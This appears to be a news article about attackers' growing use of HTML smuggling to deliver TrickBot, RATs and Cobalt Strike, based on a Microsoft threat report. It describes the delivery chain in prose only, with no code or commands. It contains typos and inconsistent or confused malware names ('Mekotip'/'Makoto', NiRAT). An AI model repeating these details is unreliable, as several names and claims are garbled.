Posted on November 14, 2021 at 2:37 PM
More Hackers Are Now Using HTML Smuggling In Malware Attacks
A recent report reveals that threat actors are increasingly using HTML smuggling for malware and phishing campaigns. Microsoft 365 Defender Threat Intelligence Team reported that these actors are now banking on the techniques to gain initial access to systems and plant their malware.
The Increasing Use Of HTML Smuggling
The range of threats includes ransomware payloads, remote administrative Trojans (RATs), and banking malware.
According to the report published by the security ream, the threat actors are actively distributing the Mekotip banking Trojans such as NiRAT and AsyncRAT, as well as the very popular TrickBot malware.
ISOMorph, also known as the multi-staged attacks, was publicly documented by Menlo Security in July 2021.
HTML smuggling is a strategy used by hackers to smuggle first-stage droppers to encode malicious scripts planted within specifically-crafted JavaScript and HTML attachments. They are planted on the target’s system by using the basic features in JavaScript and HTML5 instead of the usual exploitation of a vulnerability.
This allows the threat actors to programmatically construct the payloads on the HTML page via JavaScript rather than making an HTTP request to gather resources on a web server.
The researchers noted that after the targeted users launch the HTML on their web browsers, it decodes the malicious scripts and transfers the payload on the host device.
While doing so, it simultaneously evades perimeter security solutions. Afterward, the HTML droppers are then utilized to gather the main malware and execute it on the compromised endpoints.
State-Sponsored Hackers Also Use The Same Technique
The Microsoft researchers also noted that rather than having a malicious executable pass on the network, the threat actors develop the malware locally behind the firewall.
The ability of the threat actors to use HTTP smuggle to bypass email gateways and web proxies has made it more lucrative for them to explore. It’s also very enticing for cybercriminal groups and state-sponsored actors to deliver malware in real-world attacks, according to the researchers.
The notorious Nobelium cybercriminals responsible for the well-documented SolarWinds supply chain attack have also been discovered utilizing this type of tactic. They were seen delivering a Cobalt Strike Beacon in one of their sophisticated email-linked attacks on non-governmental organizations, consultants, think tanks, and government agencies.
The hacking group used the tactics to target these organizations located across 24 countries, including the US and some European countries.
Apart from using HTML smuggling for espionage operations, it has also been used for banking malware attacks, especially those that involve the Makoto Trojan. The threat actors generally use it to send spam emails that contain malicious links. Once the targeted user clicks on the link, it automatically triggers the download of a ZIP file that contains a JavaScript file downloader. The crawling operation of the malware is capable of retrieving binaries for keylogging and credential theft.
Also, apart from state-sponsored threat actors, other threat actors are increasingly using HTML smuggling in their various hacking campaigns. In September, DEV-0193 ran an email campaign, which was uncovered and abused to deliver TrickBot.
Microsoft Urges Organizations To Improve On Security
The threat actors used malicious HTML attachments that generates a password-protected JavaScri[t file on the victim’s computer when opened on a web browser.
Once the victim unknowingly supplies the password from the original HTML attachment, it will automatically initiate the execution of the JavaScript code. Afterward, it delivers a Base64-encoded PowerShell command that can easily download the TrickBot malware, which can result in subsequent ransomware attacks on the affected system.
Microsoft noted that there has been an increased use of HTML smuggling by threat actors to infiltrate and steal vital details from victims’ systems. The tech giant added that these campaigns are another indication that threat actors continuously refine specific components of their attacks. They do this by utilizing highly evasive hacking methods and making it very difficult for security software to detect.
Microsoft stated that such adoption of procedures, tactics, and techniques is spreading among malicious threat actors and cybercriminals. It gives credence to the belief that threat actors are constantly looking for more improved techniques to launch attacks on systems and stay under the radar without being detected.
Because of these, Microsoft has advised organizations to strengthen their security protocols against this new wave of threat using HTML smuggling.